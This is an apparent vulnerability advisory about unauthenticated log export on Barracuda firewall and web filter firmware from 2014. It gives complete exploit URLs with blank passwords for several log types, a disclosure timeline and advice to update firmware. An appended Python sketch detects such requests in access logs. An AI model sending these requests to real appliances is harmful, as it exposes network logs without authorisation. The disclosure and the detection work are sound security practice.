# Exploit Title: multiple Barracuda products logfile disclosure
# Date: 03/26/2014
# Exploit Author: Juergen Grieshofer / 4CKnowLedge
# Author Homepage: https://4ck.eu/
# Vendor Homepage: https://barracudalabs.com

# Software Link: https://firewall.ptest.cudasvc.com/
# Firmware v6.1.4.008 (2014-02-18 08:06:34)
# Model: X300Vx
# BNSEC Nr: BNSEC-4189

-- Download logs without authentication --

$Logfiles
https://firewall.ptest.cudasvc.com/cgi-mod/logexport.cgi?password=&et=&primary_tab=LOGS&log_type=fw&auth_type=Local&user=admin&locale=de_DE&secondary_tab=bfw_fwlog&export_name=export.csv?&auth_type=Local&et=&locale=de_DE&password=&realm=&role=&user=admin&primary_tab=LOGS&filter_query_netstring={%22data%22%3A[{%22field%22%3A%22%22%2C%22operator%22%3A%22%3D%22%2C%22values%22%3A[%22%22]}]%2C%22conjunction%22%3A[%22AND%22]}

For further logfiles replace the values of [fw, access, http, network, vpn, svc]

Timeline:
Vendor contacted: 03/26/2014
Vendor generic ticket response: 03/28/2014
Vendor response: 05/16/2014
Vendor approved fix: 08/02/2014

Advice: Update firmware to latest release

# Software Link: https://webfilter.ptest.cudasvc.com/
# Firmware v7.0.1.006 (2013-12-12 14:51:33)
# Model: 610VX
# BNSEC Nr: BNSEC-4230, BNSEC-2528, BNSEC-4232

-- Download logs without authentication --

$Weblog
https://webfilter.ptest.cudasvc.com/cgi-mod/spyware_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=spyware_log&message_total=

$Auditlog
https://webfilter.ptest.cudasvc.com/cgi-mod/audit_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&user=admin&primary_tab=BASIC&secondary_tab=audit_log&message_total=

$Infectionlog
https://webfilter.ptest.cudasvc.com/cgi-mod/infection_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=infection_activity&message_total=

Timeline:
Vendor contacted: 04/01/2014
Vendor response: 05/16/2014
Vendor approved fix: 08/02/2014

Advice: Update firmware to latest release
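
A detection sketch for the requests listed above, added here as an example and not part of the original advisory: it scans access-log lines (from a reverse proxy or other device in front of the appliance) for requests to the four CGI endpoints named above in which every `password` and `et` value is blank. The combined log format, the function name and the sample lines are assumptions made for this example, as is the premise that an authenticated session carries non-empty `password` and `et` values.

```python
import re
from urllib.parse import urlsplit, parse_qs

# CGI endpoints named in the advisory.
LOG_ENDPOINTS = {
    "/cgi-mod/logexport.cgi",
    "/cgi-mod/spyware_log_data.cgi",
    "/cgi-mod/audit_log_data.cgi",
    "/cgi-mod/infection_log_data.cgi",
}

# Assumed combined log format: src ... "METHOD target HTTP/x.y" status ...
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def unauthenticated_log_requests(lines):
    """Return (source, endpoint, status) for log-endpoint requests whose
    password and et parameters are all blank or absent."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path not in LOG_ENDPOINTS:
            continue
        # keep_blank_values keeps "password=" as [""] instead of dropping it.
        params = parse_qs(url.query, keep_blank_values=True)
        # The advisory's URLs repeat parameters, so check every occurrence.
        blank = all(v == "" for k in ("password", "et")
                    for v in params.get(k, [""]))
        if blank:
            # The status code lets an analyst separate served from rejected requests.
            hits.append((m.group("src"), url.path, int(m.group("status"))))
    return hits

SAMPLE = [  # constructed log lines; addresses are from documentation ranges
    '198.51.100.7 - - [02/Apr/2014:10:01:11 +0000] "GET /cgi-mod/logexport.cgi?password=&et=&primary_tab=LOGS&log_type=fw&user=admin HTTP/1.1" 200 48211',
    '192.0.2.10 - - [02/Apr/2014:10:02:40 +0000] "GET /cgi-mod/audit_log_data.cgi?password=5f4dcc3b&et=1396432960&user=admin HTTP/1.1" 200 9120',
    '198.51.100.7 - - [02/Apr/2014:10:03:05 +0000] "GET /cgi-mod/audit_log_data.cgi?auth_type=Local&et=&password=&user=admin HTTP/1.1" 403 212',
    '192.0.2.10 - - [02/Apr/2014:10:04:00 +0000] "GET /cgi-mod/index.cgi?password=&et= HTTP/1.1" 200 1500',
]
```

Hits with a 200 status on a device that predates the vendor fix are the ones to review first for log exposure.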